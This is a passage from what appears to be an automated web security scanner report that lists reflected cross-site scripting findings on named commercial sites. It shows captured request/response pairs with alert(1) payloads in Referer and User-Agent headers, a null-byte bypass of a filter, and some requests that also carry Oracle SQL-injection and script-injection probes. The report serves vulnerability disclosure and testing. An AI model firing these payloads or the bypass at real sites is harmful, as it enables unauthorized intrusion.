Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1296783972284-771336#1296786095|check#true#1296784295; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=8ba03"-alert(1)-"bdea14bb63f

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 18:00:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=8ba03"-alert(1)-"bdea14bb63f";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.483. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecec8"-alert(1)-"4dc26327075 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=ecec8"-alert(1)-"4dc26327075

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:34 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20885


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ecec8"-alert(1)-"4dc26327075";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.484. https://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44c7"-alert(1)-"c8e3ca72d49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e44c7"-alert(1)-"c8e3ca72d49
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; mbox=session#1296759528614-838261#1296762069|check#true#1296760269

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:26 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=e44c7"-alert(1)-"c8e3ca72d49";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.485. https://www.supermedia.com/spportal/login.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/login.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0f11"-alert(1)-"6068412b7ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/login.do HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b
Referer: http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:47:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.486. https://www.supermedia.com/spportal/myaccount.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/myaccount.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94ca4"-alert(1)-"a229106b012 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b
Referer: http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:48:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.487. https://www.supermedia.com/spportal/spportalFlow [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 362e4"-alert(1)-"35b4846cf0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296764957|check#true#1296763157; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=362e4"-alert(1)-"35b4846cf0a

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 20:27:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20885


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=362e4"-alert(1)-"35b4846cf0a";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.488. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffa4"-alert(1)-"6ce0b4aea6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?'"--></style></script><script>alert(0x000043)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; trafficSource=default; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; mbox=check#true#1296759729|session#1296759634912-2644#1296761529; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Referer: http://www.google.com/search?hl=en&q=2ffa4"-alert(1)-"6ce0b4aea6f

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20424


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=2ffa4"-alert(1)-"6ce0b4aea6f";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Unable to extract the flow definition id parameter
...[SNIP]...

3.489. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa04d"-alert(1)-"18e25f0779e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=fa04d"-alert(1)-"18e25f0779e

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:48:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=fa04d"-alert(1)-"18e25f0779e";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.490. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f909a"-alert(1)-"0aedf1bf8a2 was submitted in the Referer HTTP header. This input was echoed as f909a"-alert(1)-"0aedf1bf8a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761536|check#true#1296759736; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=%00f909a"-alert(1)-"0aedf1bf8a2

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:09 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20379


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%00f909a"-alert(1)-"0aedf1bf8a2";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...

3.491. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f3def"-alert(1)-"88a42c498f7 was submitted in the Referer HTTP header. This input was echoed as f3def"-alert(1)-"88a42c498f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761701|check#true#1296759901; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit
Referer: http://www.google.com/search?hl=en&q=%00f3def"-alert(1)-"88a42c498f7

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21226


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=%00f3def"-alert(1)-"88a42c498f7";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="Badly formatted flow execution key ''||(utl_inaddr
...[SNIP]...

3.492. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

